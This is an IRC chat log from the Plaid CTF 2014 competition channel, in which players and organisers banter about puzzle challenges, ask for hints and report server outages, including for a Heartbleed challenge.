  4682. (16:11:49) (asmoday) FUCK wanted the be the first curlcore
  4683. (16:11:56) (poppopret) lol it crashed
  4684. (16:12:00) (poppopret) back
  4685. (16:12:02) (tokki) that's sad
  4686. (16:12:07) (+tylerni7) poppopret: pm me I guess
  4687. (16:12:38) (iZsh) i got curlcore \o/ :)
  4688. (16:12:42) (tokki) poppopret: our team member has a similar nickname, haha
  4689. (16:12:44) (tokki) congrats xD
  4690. (16:12:48) (bool_101) grats
  4691. (16:13:12) ••• jOin: (lstamour_) ([email protected])
  4692. (16:13:33) (iZsh) reaching 48h without sleep in a few hours, meh
  4693. (16:13:53) ••• jOin: (plaintext) ([email protected])
  4694. (16:13:54) ••• jOin: (nullProtectorate) ([email protected])
  4695. (16:14:03) ••• jOin: (dedede) (d4293493@gateway/web/freenode/ip.212.41.52.147)
  4696. (16:14:07) (kiwhacks) what is the format of misc10 multiplication response ?
  4697. (16:14:16) ••• jOin: ([ToH]bp) ([email protected])
  4698. (16:14:23) (+cai_) kiwhacks: number
  4699. (16:14:26) (+cai_) int
  4700. (16:14:29) (Zoro) ZOMBIE
  4701. (16:14:30) (+tylerni7) \d+
  4702. (16:14:33) (kiwhacks) ok thanks
  4703. (16:14:57) (subsnake) NUMBER?
  4704. (16:14:58) (subsnake) !
  4705. (16:15:20) (+tylerni7) ?
  4706. (16:15:25) (+cai_) i mean, you are multipyling two numbers, what did you expect :p
  4707. (16:15:36) ([ToH]bp) 42
  4708. (16:15:45) (subsnake) unicorn works just fine
  4709. (16:15:49) (Zoro) that's not how it works
  4710. (16:15:51) (tokki) guys if there are like no hints till the end of the ctf, wat happens :O
  4711. (16:15:52) (Adran) not invalid flag? :P
  4712. (16:16:08) (WhizzMan) "unknown flag"
  4713. (16:16:17) (Adran) the same thing happens whether there are hints or no hints, the winner(s) win :>
  4714. (16:16:23) (tokki) this misc should at least be 100 points
  4715. (16:16:24) (+tylerni7) well, keep in mind that multiplication is hard
  4716. (16:16:25) (WhizzMan) What, no recount?
  4717. (16:16:26) (tokki) ^true
  4718. (16:16:26) (Adran) and everyone learns something.
  4719. (16:16:34) (iZsh) tokki: problem with hints is that it kills the scoreboard :)
  4720. (16:16:37) (+tylerni7) WhizzMan: multiplication is hard, man
  4721. (16:16:40) (tokki) :D
  4722. (16:16:53) (WhizzMan) yeah, it is
  4723. (16:16:55) (tokki) tylerni7: it is this prob is killing our team
  4724. (16:17:10) ••• qUit: (funtimes) ([email protected]) Ping timeout: 246 seconds
  4725. (16:17:20) (+tylerni7) maybe you should do another problem then :)
  4726. (16:17:21) (WhizzMan) tokki: pics!
  4727. (16:17:22) (Yerer) tokki: Try multiplying them
  4728. (16:17:23) ••• qUit: (naam) ([email protected]) Ping timeout: 240 seconds
  4729. (16:17:30) (tokki) lol
  4730. (16:17:54) ••• qUit: (zTrix) ([email protected]) Ping timeout: 250 seconds
  4731. (16:17:58) (tokki) hmm
  4732. (16:18:19) (hellman) open pls more crypto (and other tasks) until morning :)
  4733. (16:18:25) (Luffy) uh
  4734. (16:18:31) ••• qUit: ([pwn]tayacan) ([email protected]) Quit: Leaving
  4735. (16:18:32) (Luffy) is multiplication is hard broken
  4736. (16:18:35) (+tylerni7) Luffy: no
  4737. (16:18:38) (NK_) oh
  4738. (16:18:41) (Luffy) cuz im sure i multiplied them correctly
  4739. (16:18:43) (+cai_) Luffy: it's working fine :)
  4740. (16:18:49) (NK_) nooo
  4741. (16:18:52) (WhizzMan) Luffy: it's hard, that's why
  4742. (16:18:57) (NK_) this curl is linked to openssl1.0.1e
  4743. (16:18:57) (Luffy) i feel you guys snickering
  4744. (16:18:57) (+cai_) well, it's hard, so some people couldn't
  4745. (16:19:23) ••• jOin: (Stean) ([email protected])
  4746. (16:19:30) ••• jOin: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35)
  4747. (16:20:00) (haoz) a
  4748. (16:20:18) ••• jOin: (wolfpack) (9807491f@gateway/web/freenode/ip.152.7.73.31)
  4749. (16:20:31) (tokki) D:
  4750. (16:20:32) (ShortKidd) b
  4751. (16:20:39) (haoz) multiplication is hard ?
  4752. (16:20:43) (Zoro) http://www.icons-land.com/images/products/VistaFlagsIconsPreview_Flag1.jpg
  4753. (16:20:54) (Zoro) That's what Misc 10 feels like
  4754. (16:21:01) (tokki) multiplication is hard.
  4755. (16:21:14) (Adran) error: cannot divide by zero
  4756. (16:21:26) (whos_tyler) Zoro: I dont get the joke
  4757. (16:21:49) (Zoro) have you done misc 10 yet?
  4758. (16:21:57) (whos_tyler) I have
  4759. (16:22:00) (whos_tyler) still dont get it
  4760. (16:22:04) (haoz) i dun get the flag :p
  4761. (16:22:26) ••• jOin: (livinded) ([email protected])
  4762. (16:22:28) (duckyTS) misc10 is probably something stupid
  4763. (16:22:41) ••• qUit: ([pwn]Idolf) ([email protected]) Ping timeout: 258 seconds
  4764. (16:22:44) (nullProtectorate) loł
  4765. (16:22:50) (tokki) lol
  4766. (16:22:56) (livinded) 101
  4767. (16:22:57) (asmoday) some middleschooler is laughing
  4768. (16:23:11) (tokki) i love how people are like, I solved it but i dont get it
  4769. (16:23:12) (nullProtectorate) łøł
  4770. (16:23:29) ••• qUit: (vooX) (4e81ae54@gateway/web/freenode/ip.78.129.174.84) Quit: Page closed
  4771. (16:23:59) (haoz) mind to give some hints ? :p
  4772. (16:24:06) (kmowery) proofs of work :|
  4773. (16:24:08) (WhizzMan) for a 10 pt challenge? pfff
  4774. (16:24:27) (haoz) :X
  4775. (16:24:54) (WhizzMan) I'm not getting it either, but come on, it's a 10 point challenge
  4776. (16:25:01) (anyny0) Lol
  4777. (16:25:21) ••• jOin: (mouth`) ([email protected])
  4778. (16:25:22) (x_x) This 10 point challenge is mocking me.
  4779. (16:25:30) (WhizzMan) yes :)
  4780. (16:25:31) (x_x) Much like my Calculus III grade.
  4781. (16:25:32) (x_x) Y_Y
  4782. (16:25:38) (WhizzMan) you and plenty of other people
  4783. (16:25:43) (Luffy) um
  4784. (16:25:49) (Luffy) is back and time a typo
  4785. (16:25:54) (Luffy) did you guyes mean back in time
  4786. (16:25:57) (x_x) Nope, it's a hint.
  4787. (16:26:03) ••• jOin: (lfogel) ([email protected])
  4788. (16:26:03) (Luffy) it is?
  4789. (16:26:10) (x_x) Maybe?
  4790. (16:26:11) (+tylerni7) Luffy: that's a typo
  4791. (16:26:11) (+tylerni7) :P
  4792. (16:26:16) (Luffy) oh
  4793. (16:26:17) • x_x sniffles.
  4794. (16:26:19) (x_x) I hoped it was a hint.
  4795. (16:26:24) (Luffy) youre dumb
  4796. (16:26:27) (+tylerni7) Luffy: which problem?
  4797. (16:26:27) (Luffy) go away
  4798. (16:26:28) ••• qUit: (be) (ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  4799. (16:26:40) (Luffy) was talking about multiplication is hard
  4800. (16:26:43) (x_x) Multiplication is hard.
  4801. (16:27:10) (+tylerni7) there, it should say "back in time" now
  4802. (16:27:11) (shadghost) 1*1=1 , see i can multiply
  4803. (16:27:13) (Adran) man its like a chant
  4804. (16:27:56) (+cai_) voting ends in 12
  4805. (16:28:02) (namrog84) the flag isn't a number is it
  4806. (16:28:02) (tokki) ooh
  4807. (16:28:22) (tokki) they've told me it is an 'int' form
  4808. (16:28:26) (tokki) but are you guys sure
  4809. (16:28:34) (+cai_) namrog84: it is, for multiplication is hard problem
  4810. (16:28:58) (WhizzMan) so no flag{12324} but just 12324 ?
  4811. (16:29:28) (bwn3r) can anyone help me with 150 ? :'(
  4812. (16:29:32) (bwn3r) web
  4813. (16:29:35) ••• jOin: (_ariel) ([email protected])
  4814. (16:29:36) • tokki goes to corner, checks calculator and cries
  4815. (16:30:09) (Pitr_) May I complo
  4816. (16:30:19) (+cai_) WhizzMan: yeah, you shouldn't see flag{}.
  4817. (16:30:19) ••• jOin: (jablonskim) ([email protected])
  4818. (16:30:20) (Pitr_) May I compliment the creator of misc10 :D
  4819. (16:30:30) (sqall) much time consuming
  4820. (16:30:31) (sqall) such depression
  4821. (16:30:31) (sqall) very unwow :/
  4822. (16:30:50) (kurtisebear) its making me want to kill myself Im sure I need to think out the box a little but its been annoying me for like 30 mins now
  4823. (16:30:51) (WhizzMan) no amaze
  4824. (16:30:57) (tokki) ikr
  4825. (16:31:12) (x_x) It's both funny, and sad.
  4826. (16:31:51) ••• jOin: (hkr`) (~hkr@unaffiliated/hkr/x-6459160)
  4827. (16:31:54) ••• jOin: (LMolr) (89ccb77e@gateway/web/freenode/ip.137.204.183.126)
  4828. (16:32:06) (n00bz) lol voox
  4829. (16:32:18) ••• qUit: (ggis) ([email protected]) Ping timeout: 245 seconds
  4830. (16:32:19) (LMolr) hints for tenement ??
  4831. (16:32:26) ••• jOin: (jakemask) ([email protected])
  4832. (16:32:29) (LMolr) i am trying hard
  4833. (16:32:41) (LMolr) plz admi
  4834. (16:32:50) (_ariel) hey guys, i have a problem with reverse 250 (hudak), i have found a key (without patching an app), i get congratz and that's all?
  4835. (16:33:04) ••• qUit: (j0e__) ([email protected]) Ping timeout: 250 seconds
  4836. (16:33:23) (+cai_) _ariel: you can pm me the key you found
  4837. (16:33:25) (WhizzMan) you want a medal?
  4838. (16:33:50) (n00bz) any help for web300?
  4839. (16:33:53) (tokki) a gold medal!
  4840. (16:34:23) ••• qUit: (wahwah) ([email protected]) Ping timeout: 245 seconds
  4841. (16:35:45) (+cai_) 4 minutes left for voting
  4842. (16:35:52) ••• jOin: (gpp) ([email protected])
  4843. (16:36:52) (kurtisebear) and finaly got misc10
  4844. (16:37:21) (mak) To confirm, for reekee you need code execution to be able to find the flag, right?
  4845. (16:38:22) ••• qUit: (InternalCumBustI) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  4846. (16:38:45) (Hertz_) right mak
  4847. (16:39:01) ••• qUit: (Ph4te) ([email protected]) Remote host closed the connection
  4848. (16:39:35) ••• qUit: (ShortKidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Ping timeout: 240 seconds
  4849. (16:39:47) ••• jOin: (T1mb0) ([email protected])
  4850. (16:40:07) ••• jOin: (Ph4te) ([email protected])
  4851. (16:40:16) (Phshap) damn
  4852. (16:40:19) (+cai_) ##### CHANCE Card: $10 added to the pot again
  4853. (16:40:23) (+cai_) no hints :'(
  4854. (16:40:26) (Phshap) :)
  4855. (16:40:30) (Phshap) i mean :(
  4856. (16:40:33) ••• mOde: (ChanServ) sets (+o cai_)
  4857. (16:40:34) (Phshap) very L(
  4858. (16:40:39) (x_x) booo money
  4859. (16:40:48) ••• qUit: (mad0na) ([email protected]) Quit: Lost terminal
  4860. (16:40:51) (Phshap) who needs money
  4861. (16:40:56) ••• tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $20 added to each cash prizes so far (from CHANCE card))
  4862. (16:41:05) ••• mOde: (ChanServ) sets (-o cai_)
  4863. (16:41:31) ••• jOin: (AnthraX101) ([email protected])
  4864. (16:42:22) (Pitr_) Chance should have a 'valuta change to BTC' card
  4865. (16:42:39) ([ToH]bp) dogecoin or bust
  4866. (16:43:54) (WhizzMan) to the moon
  4867. (16:44:11) (WhizzMan) Pitr_: 'currency change to MTGOX BTC'
  4868. (16:45:09) (+cai_) web is opened
  4869. (16:45:21) (bobsteam) question on reekee >.>
  4870. (16:45:44) (iago-x86) Hey, can I ask somebody a question about whatscat?
  4871. (16:45:52) (+tylerni7) iago-x86: sure
  4872. (16:45:56) (+tylerni7) I just refreshed the db
  4873. (16:45:58) (_blasty_) is new web supposed to give 500 err ?
  4874. (16:46:07) (+tylerni7) _blasty_: ... probably not h/o
  4875. (16:46:09) (halfvollemelk) multiplication is hard...
  4876. (16:46:26) (grimmlin_) crash double free:
  4877. (16:46:35) (mongo12) five double oh!!
  4878. (16:46:36) (grimmlin_) arf, wrong window
  4879. (16:46:37) (Adran) is halphow2js supposed to be giving 500?
  4880. (16:46:41) (+tylerni7) h/o
  4881. (16:46:43) (mongo12) call the nine one one
  4882. (16:46:55) (tokki) am I still online?
  4883. (16:46:55) (_blasty_) internet pwn-lice
  4884. (16:47:13) (jduck) q/uit 502 Bad Gateway
  4885. (16:47:14) (jduck) oops
  4886. (16:47:20) (tokki) lol
  4887. (16:47:28) (shadghost) Burp proxy error: Failed to connect to 54.196.246.17:8001
  4888. (16:47:50) (mischa__) halphow2js down?
  4889. (16:48:36) ••• jOin: (trelgak) ([email protected])
  4890. (16:48:51) (namrog84) 65
  4891. (16:48:59) (+tylerni7) ok
  4892. (16:49:05) ••• qUit: (cybertech) (4432fdee@gateway/web/freenode/ip.68.50.253.238) Ping timeout: 240 seconds
  4893. (16:49:06) ••• jOin: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115)
  4894. (16:49:06) (+tylerni7) HALPHOW2JS IS RUNNING NOW
  4895. (16:49:16) (acez) who can I ping for kappa
  4896. (16:49:24) (Im11Plus) Web 200 easy
  4897. (16:49:31) (Im11Plus) Gives you flag, such wow
  4898. (16:49:41) (haoz) multiplication is hard...
  4899. (16:49:48) (namrog84) multiplication is hard...
  4900. (16:49:49) (anyny0) Indeed
  4901. (16:49:59) (namrog84) just stick it in calculator, made easy!
  4902. (16:50:06) (tokki) D:...
  4903. (16:50:11) (tokki) its hard..
  4904. (16:50:23) ••• qUit: (nullProtectorate) ([email protected]) Remote host closed the connection
  4905. (16:50:48) (haoz) something wrong with my calculator ? :(
  4906. (16:50:49) ••• jOin: (asdfasdfasdfasdf) (4738ed75@gateway/web/freenode/ip.71.56.237.117)
  4907. (16:50:55) (namrog84) probably
  4908. (16:51:03) (namrog84) do you have CTF mode enabled?
  4909. (16:51:16) (tokki) lol
  4910. (16:51:22) (haoz) lolll....
  4911. (16:51:26) (x_x) The batteries on my TI died. Cannae enter it into CTF mode.
  4912. (16:51:32) ••• jOin: (nullProtectorate) ([email protected])
  4913. (16:51:39) (tokki) TI's eat a lot of batteries
  4914. (16:51:45) (x_x) They really do.
  4915. (16:51:50) ••• nIck: (Zoro) is now known as (aobugw4uob49tt34)
  4916. (16:51:56) (tokki) and they are goddamn expensive, heavy,
  4917. (16:52:01) (halfvollemelk) I'm sure I multiplied it correctly...
  4918. (16:52:05) ••• nIck: (aobugw4uob49tt34) is now known as (Zoro)
  4919. (16:52:06) (tokki) and yet my scholl makes us buy them..
  4920. (16:52:32) (trelgak) can anyone push me in the right direction for reversing200? been working on it for forever..
  4921. (16:52:51) ••• jOin: (wahwah) ([email protected])
  4922. (16:52:59) (x_x) I want one of those newer CAS models. They have fancy pants 3D graphing.
  4923. (16:53:23) (Im11Plus) lul web 200 end.response
  4924. (16:53:49) (tokki) x_x: rly?! oh god technology
  4925. (16:54:04) (x_x) Delicious technology
  4926. (16:54:08) (shortkidd) reverse it, trel
  4927. (16:54:23) ••• qUit: (Stean) ([email protected]) Quit: Leaving.
  4928. (16:54:25) (Zoro) http://play.plaidctf.com/files/g++-30f6a74ce24ea3605ba7cbec92222a72.tar.bz2 - nginx 404 Not Found.
  4929. (16:54:31) (x_x) Refresh a few times.
  4930. (16:54:39) (x_x) It'll get there eventually.
  4931. (16:54:42) ••• jOin: (fritz[]) ([email protected])
  4932. (16:54:44) ••• qUit: (poppopret) ([email protected]) Remote host closed the connection
  4933. (16:55:28) (trelgak) can anyone help me answer a question i have about reversing 200?
  4934. (16:56:11) (WhizzMan) Heh, multiplication is hard is funnier than you'd think, especially if you know why the answer is what it is
  4935. (16:56:21) (Luffy) ya
  4936. (16:56:29) (Luffy) its funny :)
  4937. (16:56:30) (+cai_) WhizzMan: :
  4938. (16:56:32) (+cai_) :)*
  4939. (16:56:43) (+tylerni7) trelgak: perhaps
  4940. (16:56:43) (x_x) This is just getting cruel.
  4941. (16:56:45) (+tylerni7) you can pm
  4942. (16:56:54) (x_x) Like every math professor I've ever had.
  4943. (16:56:57) (x_x) >_>
  4944. (16:57:22) (haoz) :|
  4945. (16:57:55) (halfvollemelk) jo, wtf is this sorcery
  4946. (16:58:07) (halfvollemelk) suddenly I check my scoreboard and multiplication is solved
  4947. (16:58:29) (Adran) suddenly math is hard
  4948. (16:58:40) (halfvollemelk) suddenly i'm even more confused
  4949. (16:58:43) ([ToH]bp) Infinity - object > []?
  4950. (16:58:44) ••• jOin: (deject3d) ([email protected])
  4951. (16:58:45) (tokki) D:....
  4952. (16:59:09) (tokki) i still dont get the multiplication is hard
  4953. (16:59:14) (tokki) its hard
  4954. (16:59:20) (LMolr) i dont get crypto 20
  4955. (16:59:23) (LMolr) :/
  4956. (16:59:27) (tokki) :/
  4957. (16:59:29) ••• qUit: (eZpl0it) ([email protected]) Ping timeout: 252 seconds
  4958. (16:59:33) (WhizzMan) halfvollemelk: playing with more people on your team?
  4959. (16:59:38) (tokki) lol
  4960. (16:59:48) (haoz) my mathssss....
  4961. (17:00:02) (LMolr) maybe i am """special"""
  4962. (17:00:11) ••• jOin: (nodoc) ([email protected])
  4963. (17:00:35) ••• qUit: (psaikonet1) ([email protected]) Quit: Leaving.
  4964. (17:01:37) (Adran) computers are hard, time to pack my bags
  4965. (17:03:03) (deject3d) crypto 20 is one of the simplest ciphers
  4966. (17:03:06) (tokki) wat
  4967. (17:03:08) (tokki) wat?!
  4968. (17:03:10) (tokki) wat?!?!?
  4969. (17:03:33) (Lopi) who can I pm with a question regarding a challenge?
  4970. (17:03:35) (Adran) it was pretty easy
  4971. (17:03:39) (+tylerni7) Lopi: me
  4972. (17:04:23) (kiwhacks) misc10 makes me crazy...
  4973. (17:04:48) (namrog84) ditto
  4974. (17:04:48) (tokki) lol ya
  4975. (17:05:00) (Luffy) nah
  4976. (17:05:03) (Luffy) theyre pretty easy
  4977. (17:05:14) (Luffy) just gotta think outside the box
  4978. (17:05:24) (namrog84) im so far outside the box, i dont even know where the box was
  4979. (17:05:35) (livinded) is reekee getting hammered?
  4980. (17:05:41) (Adran) I've stretched out the box so much its now a circle
  4981. (17:05:54) (deject3d) reekee sux
  4982. (17:05:56) ••• jOin: (ggis) ([email protected])
  4983. (17:06:15) ••• jOin: (naam) ([email protected])
  4984. (17:06:40) ••• jOin: (nofiki1) ([email protected])
  4985. (17:06:43) ••• qUit: (nofiki1) ([email protected]) Client Quit
  4986. (17:06:50) ••• jOin: (mascot) ([email protected])
  4987. (17:07:25) (namrog84) 38.55 * 1700
  4988. (17:07:33) (namrog84) oops
  4989. (17:07:51) (shadghost) namrog84: copy past is also hard?
  4990. (17:07:55) ••• jOin: (nofiki1) ([email protected])
  4991. (17:08:14) (namrog84) yes, I am clearly an incapable of normal computer operations
  4992. (17:08:27) (namrog84) can't even construct a sentence correctly either
  4993. (17:08:34) (shadghost) so, now is the time to try the fucke dup challanges right
  4994. (17:08:58) (dkohlbre) is kappa supposed to take as much CPU as watching twitch does? Its making my laptop takeoff :/
  4995. (17:09:10) (tokki) asdfasdfasdfasfdafsadf
  4996. (17:10:36) ••• jOin: (dvddaver) ([email protected])
  4997. (17:11:05) ••• qUit: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Ping timeout: 240 seconds
  4998. (17:11:32) ••• qUit: (anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  4999. (17:11:59) ••• qUit: (nofiki1) ([email protected]) Client Quit
  5000. (17:12:09) ••• qUit: (sewilton) ([email protected]) Ping timeout: 252 seconds
  5001. (17:12:34) ••• jOin: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109)
  5002. (17:12:35) ••• qUit: (_ariel) ([email protected]) Ping timeout: 240 seconds
  5003. (17:12:36) (iago-x86) dkohlbre: It shouldn't
  5004. (17:12:42) (tokki) twitch pokemon!
  5005. (17:12:44) (namrog84) woo!! Got multiply is hard!
  5006. (17:12:57) (namrog84) <- idiot
  5007. (17:13:05) (tokki) did you get key?
  5008. (17:13:23) (namrog84) yep :D
  5009. (17:13:31) (tokki) holy shet, i should be working on it harder
  5010. (17:13:34) (dvddaver) Anybody solved ezhp?
  5011. (17:13:39) (namrog84) now back to the awful web150
  5012. (17:13:53) (Ymgve) dvddaver: only 58 teams
  5013. (17:13:53) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  5014. (17:14:33) (haoz) im the another idiot >.<
  5015. (17:14:35) ••• jOin: (_ariel) ([email protected])
  5016. (17:14:50) (asmoday) dogestege is that one where I have to find the same image online
  5017. (17:15:04) (haoz) namrog84 : mind to ...... ? :p
  5018. (17:15:41) (LMolr) tenement owns me
  5019. (17:15:44) (tokki) 38.55 * 1700 is freaking 65535
  5020. (17:15:52) (asmoday) hhahaha
  5021. (17:15:55) (namrog84) :D
  5022. (17:16:00) (tokki) :D
  5023. (17:16:03) (tokki) :D....
  5024. (17:16:11) (namrog84) ...... there it is, i typed it in, but i think the channel blocks flags :D
  5025. (17:16:21) (Adran) anyone willing to answer a question about a puzzle/hunt?
  5026. (17:16:29) (namrog84) just like passwords: ********
  5027. (17:16:31) (acez) tylerni7: who can I ping for kappa ?
  5028. (17:16:35) (Ymgve) tokki: it's not a 1 pointer
  5029. (17:16:51) (tokki) :D
  5030. (17:16:57) (supersat) man... I love paris. mov eax, 0 mov eax, [eax]
  5031. (17:17:00) (supersat) luuuuulz
  5032. (17:17:01) (+dickoff) acez: me
  5033. (17:17:06) (n00bz) web300 is down
  5034. (17:18:02) (tokki) :D
  5035. (17:18:32) ••• qUit: (_ariel) ([email protected]) Client Quit
  5036. (17:18:35) ••• qUit: (phiber_) ([email protected]) Ping timeout: 240 seconds
  5037. (17:18:54) ••• jOin: (pctf376) (46b9d762@gateway/web/freenode/ip.70.185.215.98)
  5038. (17:18:55) ••• qUit: (Hertz_) ([email protected])
  5039. (17:18:57) ••• qUit: (tarkiz) ([email protected]) Ping timeout: 260 seconds
  5040. (17:19:18) (tokki) c ya guyz tomz
  5041. (17:19:19) (tokki) living in a different timezone, i think im gonna go sleep
  5042. (17:19:30) (tokki) xD
  5043. (17:19:45) ••• qUit: (T1mb0) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Nine out of ten l33t h4x0rz prefer it
  5044. (17:19:46) (haoz) its 6.20am here
  5045. (17:19:48) (dct1) pfshs sleep, excuses
  5046. (17:19:50) (WhizzMan) namrog84: hunter7
  5047. (17:20:51) ••• qUit: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60) Quit: Page closed
  5048. (17:21:20) ••• qUit: (_bcc) ([email protected]) Ping timeout: 258 seconds
  5049. (17:21:53) (inter) welllll
  5050. (17:21:55) (inter) that econ midterm
  5051. (17:21:57) (inter) FUCKkkk
  5052. (17:22:55) (namrog84) WhizzMan how do you know my password?!
  5053. (17:22:59) (namrog84) :P
  5054. (17:23:30) ••• qUit: (Kyrah) ([email protected])
  5055. (17:23:35) ••• qUit: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158) Ping timeout: 240 seconds
  5056. (17:24:37) ••• qUit: (asdfasdfasdfasdf) (4738ed75@gateway/web/freenode/ip.71.56.237.117) Quit: Page closed
  5057. (17:24:53) ••• jOin: (erketu1) ([email protected])
  5058. (17:25:13) ••• qUit: (erketu) ([email protected]) Ping timeout: 245 seconds
  5059. (17:25:17) (haoz) i need maths tuition...seriously... lol
  5060. (17:26:11) ••• jOin: (Aristokratov) (80d3c245@gateway/web/freenode/ip.128.211.194.69)
  5061. (17:26:42) ••• jOin: (erketu) ([email protected])
  5062. (17:27:11) ••• qUit: (altf4) ([email protected]) Ping timeout: 252 seconds
  5063. (17:29:36) (dvddaver) Can anybody give me a ping on ezhp?
  5064. (17:29:47) ••• qUit: (awreece) (~awreece@unaffiliated/awreece) Ping timeout: 240 seconds
  5065. (17:30:01) ••• pArt: (erketu) ([email protected])
  5066. (17:30:05) ••• qUit: (sorin_) (5e34c7a9@gateway/web/freenode/ip.94.52.199.169) Ping timeout: 240 seconds
  5067. (17:30:08) ••• qUit: (erketu1) ([email protected]) Ping timeout: 276 seconds
  5068. (17:30:37) ••• jOin: (naam) ([email protected])
  5069. (17:30:39) ••• qUit: (n00bz) ([email protected]) Remote host closed the connection
  5070. (17:30:49) ••• jOin: (phiber_) ([email protected])
  5071. (17:31:03) ••• qUit: (wahwah) ([email protected]) Ping timeout: 245 seconds
  5072. (17:31:14) ••• jOin: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115)
  5073. (17:32:35) (netsurf3) anyone mind me pm'ing them about multiplication is hard?
  5074. (17:32:50) ••• jOin: (DuhJangOh) (406a2765@gateway/web/cgi-irc/kiwiirc.com/ip.64.106.39.101)
  5075. (17:33:02) (javex) who to query for rendezvous?
  5076. (17:33:29) (netsurf3) been looking at that one myself... pain in the arse
  5077. (17:33:34) (+tylerni7) javex: houqp
  5078. (17:33:59) ••• pArt: (subsnake) ([email protected])
  5079. (17:34:03) ••• jOin: (Stean) ([email protected])
  5080. (17:34:12) ••• qUit: (lstamour_) ([email protected]) Quit: leaving
  5081. (17:34:48) ••• qUit: (mascot) ([email protected]) Ping timeout: 245 seconds
  5082. (17:34:50) (deject3d) django sucks
  5083. (17:34:56) (+tylerni7) hah
  5084. (17:35:04) ••• jOin: (chunderstruck1) ([email protected])
  5085. (17:35:10) (deject3d) i am reading the git source and the comment is inconsistent with what the example says
  5086. (17:35:21) (deject3d) how do these god damn cookies work
  5087. (17:35:37) (shortkidd) you eat them
  5088. (17:35:40) ••• jOin: (_bcc) ([email protected])
  5089. (17:35:56) ••• jOin: (lollip) (89ccb77e@gateway/web/freenode/ip.137.204.183.126)
  5090. (17:36:23) ••• qUit: (alamar) (alamar@2a02:180:a:1:1::110) Ping timeout: 240 seconds
  5091. (17:36:38) ••• jOin: (lstamour_) (18699342@gateway/web/freenode/ip.24.105.147.66)
  5092. (17:36:47) (Adran) who can i message about web150?
  5093. (17:36:54) (tomcr00se) dude i love javascript
  5094. (17:36:58) (+tylerni7) nice
  5095. (17:37:03) ••• qUit: (sadcat) ([email protected]) Ping timeout: 258 seconds
  5096. (17:37:05) ••• jOin: (userk) ([email protected])
  5097. (17:37:13) (lollip) any hint for halphow2js ?
  5098. (17:37:23) ••• jOin: (sadcat) ([email protected])
  5099. (17:37:42) ••• qUit: (DeadheadTn) ([email protected]) Ping timeout: 252 seconds
  5100. (17:37:52) ••• jOin: (alamar) ([email protected])
  5101. (17:38:06) (shortkidd) use javascript
  5102. (17:38:18) ••• nIck: (alamar) is now known as (Guest7603)
  5103. (17:38:25) (Anyny0) Damn, thought it was sql!
  5104. (17:38:31) (shortkidd) Well now you know!
  5105. (17:39:45) (Zoro) which problem is halphow2js?
  5106. (17:40:22) (inter) tomcr00se: wut is javascript :britishface:
  5107. (17:40:37) (x_x) I'm not that good with java.
  5108. (17:40:42) (LMolr) pwned tenment
  5109. (17:40:50) (LMolr) die
  5110. (17:40:54) (+ricky) Woo, my super cool problem is almost done
  5111. (17:40:59) (+ricky) Hopefully it's solvable in <24 hours
  5112. (17:41:03) (Ymgve) Zoro: leftmost on the second page
  5113. (17:41:08) (inter) ricky: which problem
  5114. (17:41:09) ••• qUit: (Mawat) ([email protected])
  5115. (17:41:10) (inter) is yourserino
  5116. (17:41:24) (kmowery) does wheeeee have a line length limit
  5117. (17:41:45) (+tylerni7) kmowery: yeah there is a max amount you can send it
  5118. (17:41:53) (+ricky) inter: It's not on the board yet
  5119. (17:42:02) (DuhJangOh) so i dont understand why heartbleed isnt exploiting
  5120. (17:42:06) ••• qUit: (paul_55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243) Quit: Page closed
  5121. (17:42:18) ••• qUit: (nadar) ([email protected]) Ping timeout: 245 seconds
  5122. (17:42:21) ••• jOin: (altf4) ([email protected])
  5123. (17:42:29) (DuhJangOh) we run it on https://54.82.147.138:45373 (the one provided in the problem), right?
  5124. (17:42:54) (kmowery) tylerni7: is that known or should i keep binary searching it?
  5125. (17:43:07) (haoz) someone plz.. multiplication is harddd... :|
  5126. (17:43:32) (shortkidd) DuhJangOh: I just tried it again, and it's still exploiting
  5127. (17:43:34) (+tylerni7) kmowery: it's not known.. shouldn't be too important
  5128. (17:44:09) (kmowery) tylerni7: huh, alright
  5129. (17:44:29) ••• jOin: (TMT) ([email protected])
  5130. (17:44:39) (+tylerni7) DuhJangOh: hm we have it set up on other ports as well
  5131. (17:45:34) ••• jOin: (nadar) ([email protected])
  5132. (17:46:49) (+tylerni7) DuhJangOh: it might be crashed I'm looking at it now
  5133. (17:47:29) (DuhJangOh) what ports? i just did an nmap scan and it said it was down
  5134. (17:47:35) (DuhJangOh) might be my kali copnnection though
  5135. (17:47:40) ••• jOin: (oceanx) ([email protected])
  5136. (17:47:43) (+tylerni7) server seems sad, I'm looking into it
  5137. (17:48:56) (pd7) heartbleed seems to be up and working for me
  5138. (17:49:06) (+tylerni7) I couldn't ssh to it just now
  5139. (17:49:09) (+tylerni7) imma reboot
  5140. (17:49:18) (pd7) well the exploit works
  5141. (17:49:23) (shortkidd) Same here
  5142. (17:49:58) (+tylerni7) weird
  5143. (17:50:45) (shortkidd) what other ports is it open on?
  5144. (17:50:48) (shortkidd) still the 10k-11k?
  5145. (17:51:01) ••• qUit: (AlephZero) ([email protected]) Ping timeout: 252 seconds
  5146. (17:51:17) (+tylerni7) yeah, but I"m rebooting it now
  5147. (17:51:21) (shortkidd) alright
  5148. (17:52:12) ••• nIck: (Guest7603) is now known as (alamar)
  5149. (17:52:46) ••• qUit: (krycek1) ([email protected]) Ping timeout: 258 seconds
